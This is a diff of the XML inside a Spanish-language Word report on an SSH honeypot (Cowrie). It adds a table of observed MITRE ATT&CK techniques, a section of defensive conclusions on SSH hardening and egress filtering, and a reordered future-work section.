+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Command and Control</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1090 Proxy</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">56</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1300"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Command and Control</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1105 Ingress Tool Transfer</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">12</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1300"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Impact</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1496.001 Resource Hijacking: Compute Hijacking</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">3</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1300"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Collection</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1005 Data from Local System</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:before="60" w:line="360"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tabla 15. Técnicas MITRE ATT&amp;CK más relevantes por táctica.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:spacing w:before="240" w:line="360"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figura 8</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:spacing w:line="360"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Técnicas MITRE ATT&amp;CK observadas (sesiones por técnica)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="4762500" cy="4429125"/>
+            <wp:effectExtent t="0" r="0" b="0" l="0"/>
+            <wp:docPr id="10" name="" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18" cstate="none"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4762500" cy="4429125"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Los datos reales obligaron a ampliar el clasificador. Siete técnicas no estaban previstas en las reglas iniciales (entre ellas T1497.001, T1090, T1005 y T1552.003), y se detectó un falso positivo: listar el directorio /var/log se clasificaba como borrado de registros (T1070.002). Tras los cambios, los comandos sin técnica asignada pasaron de 508 a 40 y el conjunto de pruebas automáticas creció de 33 a 50 casos, todos superados. También se corrigió el análisis de ficheros: Cowrie registra como descarga cualquier contenido escrito con una redirección (echo … &gt; fichero), de modo que las 623 «descargas» iniciales eran en su mayoría claves SSH y scripts escritos por los bots; ahora se agrupan por hash y se distingue el tipo de origen.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Primeras Conclusiones Defensivas</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Casi toda la actividad observada se habría neutralizado con tres medidas que no requieren herramientas comerciales, y que coinciden con las mitigaciones de ATT&amp;CK asociadas a cada técnica:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23680,66 +27051,20 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Ataque controlado desde Kali Linux con hydra y verificación en cowrie.json (CU-03).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:keepNext/>
-        <w:pageBreakBefore/>
-        <w:spacing w:after="240" w:before="240" w:line="360"/>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Trabajos Futuros</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-        <w:ind w:firstLine="709"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">El proyecto sienta las bases para diversas líneas de ampliación y mejora que podrían desarrollarse como continuación de este trabajo, como proyecto de Máster o como implementación profesional en un entorno corporativo.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:keepNext/>
-        <w:spacing w:after="240" w:before="240" w:line="360"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Evolución del Honeypot</w:t>
+        <w:t xml:space="preserve">Autenticación SSH solo con clave y sin acceso como root (M1032, M1026): </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">anula la fuerza bruta, que supone el 76 % de las sesiones, y es la configuración aplicada al SSH real del proyecto en el puerto 2022.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23760,15 +27085,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Honeypot de alta interacción: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">sustituir Cowrie por un sistema que proporcione un Linux real al atacante (mediante contenedores Docker o máquinas virtuales aisladas con snapshots automáticos), permitiendo capturar comportamientos más avanzados como escalada de privilegios, movimiento lateral, instalación de rootkits y comunicación con servidores de comando y control (C2). La configuración de Cowrie con backend proxy hacia una VM real ya lo soporta, aunque requiere un aislamiento riguroso.</w:t>
+        <w:t xml:space="preserve">Control de integridad sobre authorized_keys (M1022): </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">detectaría la persistencia de Outlaw, la campaña más extendida.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23789,15 +27114,90 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Honeypot multi-protocolo: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ampliar la captura a otros servicios frecuentemente atacados: HTTP (ataques a paneles de administración, exploits de aplicaciones web), Telnet (IoT), FTP (credenciales y malware), SMB (ransomware, EternalBlue). Plataformas como T-Pot integran más de 20 honeypots diferentes en un único despliegue con Docker Compose, aunque requieren significativamente más recursos.</w:t>
+        <w:t xml:space="preserve">Filtrado del tráfico saliente y AllowTcpForwarding no (M1037, M1042): </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">impide la descarga de herramientas, la conexión del minero con su pool y el uso del servidor como proxy.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Estas conclusiones se basan en tres días de datos y se revisarán con el periodo completo de captura, ya que las campañas aparecen y desaparecen y algunas pueden no haberse manifestado todavía.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:keepNext/>
+        <w:pageBreakBefore/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Trabajos Futuros</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El proyecto sienta las bases para diversas líneas de ampliación y mejora que podrían desarrollarse como continuación de este trabajo, como proyecto de Máster o como implementación profesional en un entorno corporativo.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Evolución del Honeypot</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23818,33 +27218,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Red distribuida de honeypots: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">desplegar instancias de Cowrie en múltiples regiones cloud (Europa, América, Asia) para comparar los patrones de ataque por zona geográfica y detectar campañas globales coordinadas. Los datos podrían centralizarse en un único dashboard para su correlación.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:keepNext/>
-        <w:spacing w:after="240" w:before="240" w:line="360"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Mejora del Análisis</w:t>
+        <w:t xml:space="preserve">Honeypot de alta interacción: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sustituir Cowrie por un sistema que proporcione un Linux real al atacante (mediante contenedores Docker o máquinas virtuales aisladas con snapshots automáticos), permitiendo capturar comportamientos más avanzados como escalada de privilegios, movimiento lateral, instalación de rootkits y comunicación con servidores de comando y control (C2). La configuración de Cowrie con backend proxy hacia una VM real ya lo soporta, aunque requiere un aislamiento riguroso.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23865,15 +27247,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Análisis de malware: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">integrar un sandbox como Cuckoo Sandbox o el servicio cloud de ANY.RUN para analizar automáticamente los binarios descargados por los atacantes, extrayendo indicadores de compromiso (IOC) adicionales: hashes, dominios contactados, claves de registro modificadas y comportamiento en red.</w:t>
+        <w:t xml:space="preserve">Honeypot multi-protocolo: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ampliar la captura a otros servicios frecuentemente atacados: HTTP (ataques a paneles de administración, exploits de aplicaciones web), Telnet (IoT), FTP (credenciales y malware), SMB (ransomware, EternalBlue). Plataformas como T-Pot integran más de 20 honeypots diferentes en un único despliegue con Docker Compose, aunque requieren significativamente más recursos.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23894,15 +27276,33 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Machine learning para detección de patrones: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">aplicar algoritmos de clustering (K-Means, DBSCAN) sobre las sesiones de ataque para identificar grupos de atacantes con comportamientos similares, detectando campañas coordinadas o variantes de un mismo bot. Las características podrían incluir secuencias de comandos, intervalos temporales y credenciales probadas.</w:t>
+        <w:t xml:space="preserve">Red distribuida de honeypots: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">desplegar instancias de Cowrie en múltiples regiones cloud (Europa, América, Asia) para comparar los patrones de ataque por zona geográfica y detectar campañas globales coordinadas. Los datos podrían centralizarse en un único dashboard para su correlación.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Mejora del Análisis</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23923,33 +27323,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Visualización geográfica interactiva: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">generar un mapa interactivo (Leaflet o Folium) con la distribución geográfica de los atacantes, actualizándose en tiempo real conforme se registran nuevos ataques. Incluir líneas de flujo que muestren las rutas de ataque y heatmaps de densidad por región.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:keepNext/>
-        <w:spacing w:after="240" w:before="240" w:line="360"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Integración y Automatización</w:t>
+        <w:t xml:space="preserve">Análisis de malware: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">integrar un sandbox como Cuckoo Sandbox o el servicio cloud de ANY.RUN para analizar automáticamente los binarios descargados por los atacantes, extrayendo indicadores de compromiso (IOC) adicionales: hashes, dominios contactados, claves de registro modificadas y comportamiento en red.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23970,15 +27352,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Automatización con Wazuh: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">desarrollar reglas personalizadas y decodificadores en Wazuh que generen alertas en tiempo real cuando se detecten patrones de ataque específicos: más de 100 intentos de login desde la misma IP en una hora, descarga de binarios con hashes conocidos como malware, o ejecución de comandos asociados a técnicas MITRE ATT&amp;CK concretas.</w:t>
+        <w:t xml:space="preserve">Machine learning para detección de patrones: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
